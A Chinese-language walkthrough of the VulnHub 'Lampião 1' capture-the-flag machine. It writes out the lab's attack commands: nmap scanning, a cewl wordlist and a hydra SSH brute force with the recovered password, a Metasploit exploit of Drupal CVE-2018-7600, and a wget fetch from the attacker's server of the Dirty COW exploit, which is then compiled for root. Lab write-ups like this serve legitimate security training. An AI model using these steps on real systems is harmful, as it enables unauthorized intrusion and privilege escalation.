VulnHub-Lampiao渗透

  • A+
所属分类:安全文章

靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/

靶机难度:简单

靶机发布日期:2018年7月28日

靶机描述:Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! "Lampião 1".

目标:得到root权限&找到flag.txt

作者:**大余**

时间:2019-12-27


请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。


一、信息收集


我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

VulnHub-Lampiao渗透

使用命令:nmap -sP 192.168.145.0/24


上一篇GoldenEye-1已经简单介绍了netdiscover的使用,个人比较喜欢用nmap,这边就不介绍了。


我们开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口扫描:

VulnHub-Lampiao渗透


图中可以看出,目标计算机上有三个可用的开放端口22、80、1898端口。这里对22端口,尝试ssh弱口令爆破,并没有结果,这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf、hydra等,后期文章攻击也会使用到。


由于目标计算机上的端口80可用,我们先来检查下web页面。我们在浏览器上打开了目标计算机的IP,它显示了一个有趣的页面:

VulnHub-Lampiao渗透

这是一个静态页面,我开始检查主页的html内容以获取任何有用的提示(F12查看),nikto扫了没什么发现,gobuster、dirb和御剑扫目录,都没什么发现,半小时过去...尴尬,并没有什么有用的信息....先暂时不管80端口了...

还有个1898端口开启状态,继续访问获取信息。

VulnHub-Lampiao渗透

可以分别进入两个页面:

VulnHub-Lampiao渗透

VulnHub-Lampiao渗透

第一栏点进去内容翻译后并没有什么有效的信息,第二栏点进去细心的我发现了这是node/3,这是第三栏的内容,说明还有第二栏的内容没有显示,修改下页面试试。

VulnHub-Lampiao渗透

audio.m4a

qrc.png

经过长时间终于有点有用的信息了...访问试试

VulnHub-Lampiao渗透

VulnHub-Lampiao渗透

这里发现了一段语音和一个二维码,语音内容为:user tiago,则用户名为:tiago

二维码用微信扫描发现为一句话:Try harder!Muahuahua...并没啥用

这边开始用工具对网站进行爆破扫描...

VulnHub-Lampiao渗透

找到了一个robots.txt文件,后台打开看看

VulnHub-Lampiao渗透

这里经过长时间收集信息,在CHANGELOG.txt文件,发现网站的版本信息:

VulnHub-Lampiao渗透

这是一个基于Drupal 7的博客或是社交网站。

VulnHub-Lampiao渗透

这边在页面没什么收获了,开始用工具进行暴力攻击。

cewl:通过爬行网站获取关键信息创建一个密码字典

hydra:神器九头蛇,网上有太多资料

使用命令:cewl http://192.168.145.148:1898/?q=node/1 -w dayu.txt

hydra -l tiago -P dayu.txt 192.168.145.148 ssh

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:

用户: tiago  

密码: Virgulino

VulnHub-Lampiao渗透

使用用户名tiago进行ssh登陆连接,成功连接,但是不能用sudo su进行提权!!


二、提权shell


我们要针对收集到的信息进行提权。

这边收集到了版本是2016年的、Durpal 7。

VulnHub-Lampiao渗透

这边搜索到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透试试。

VulnHub-Lampiao渗透

运行msfconsole。

VulnHub-Lampiao渗透

这是一种新渗透方法,先查询durpal在MSF中存在哪些漏洞,我们需要使用的是2018年的漏洞,use选择4提取CVE-2018-7600漏洞,show option查询渗透信息,需要填写Rhosts攻击IP,Rport攻击端口。

VulnHub-Lampiao渗透

成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,这是另外一种渗透的方法,可以好好学习。

下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权目前已经修复,仅供参考学习。

VulnHub-Lampiao渗透

命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp

使用CP进行复制到本地,cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~

思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上。

VulnHub-Lampiao渗透

命令:python -m SimpleHTTPServer 5555   开启服务

VulnHub-Lampiao渗透

命令:wget http://192.168.182.135:5555/40847.cpp

将40847.cp上传到靶机上。

VulnHub-Lampiao渗透

VulnHub-Lampiao渗透

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告

2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告

3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高

4. -std=c++11就是用按C++2011标准来编译的

5. -pthread 在Linux中要用到多线程时,需要链接pthread库

6. -o dcow gcc生成的目标文件,名字为dcow

执行gcc编译可执行文件,可直接提权。

VulnHub-Lampiao渗透

这个靶场还是学到了很多的东西,比如说如何一步一步进行渗透,

虽说与真实的环境相差甚远,但是最主要了还是用来锻炼自己的能力,

在本篇的实验中还是存在很多的不足的!还是要靠百度来进行一步一步的探索

主要还是自己的知识面太窄了,比如说这个脏牛提权,百度才知道...

看来以后还是要多扩大自己的知识面,前面的都还行,遇上一个实验差不多,

到了提权这一步就开始花里胡哨,自己就很懵比,就很难受!!!!

还是要多学习!!


由于我们已经成功得到root权限&找到flag.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。




VulnHub-Lampiao渗透



VulnHub-Lampiao渗透


本文始发于微信公众号(暗影安全):VulnHub-Lampiao渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: